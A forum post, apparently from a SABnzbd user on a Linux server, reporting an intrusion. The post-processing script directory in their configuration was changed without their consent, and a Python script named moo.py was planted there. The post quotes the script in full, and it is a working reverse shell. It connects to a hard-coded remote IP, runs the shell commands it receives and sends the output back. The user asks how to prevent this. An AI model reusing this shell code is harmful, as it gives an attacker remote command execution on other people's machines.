after looking at my successfully downloaded files I noticed the following directories: fu and fu.1 in the downloads area.
both contained a script called moo.py.
In the sabnzbd settings this directory was set as the user-post-processing directory. (not by me)
Both files owned by the user sabnzbd (limited rights).
Running sabnzbd on a Linux server, version 0.7.20
The contents of the file is:
Code: Select all
#!/usr/bin/python import socket,subprocess HOST = '126.96.36.199' # The remote host PORT = 4430 # The same port as used by the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect to attacker machine s.connect((HOST, PORT)) # send we are connected s.send('[*] Connection Established!') # start loop while 1: # recieve shell command data = s.recv(1024) # if its quit, then break out and close socket if data == "quit": break # do shell command proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) # read output stdout_value = proc.stdout.read() + proc.stderr.read() # send output to attacker s.send(stdout_value) # close socket s.close()
How do I stop this happening in the future, specially the part where my sabnzbd configuration was changed to set the "fu" directory as postprocessing user script directory by something/someone.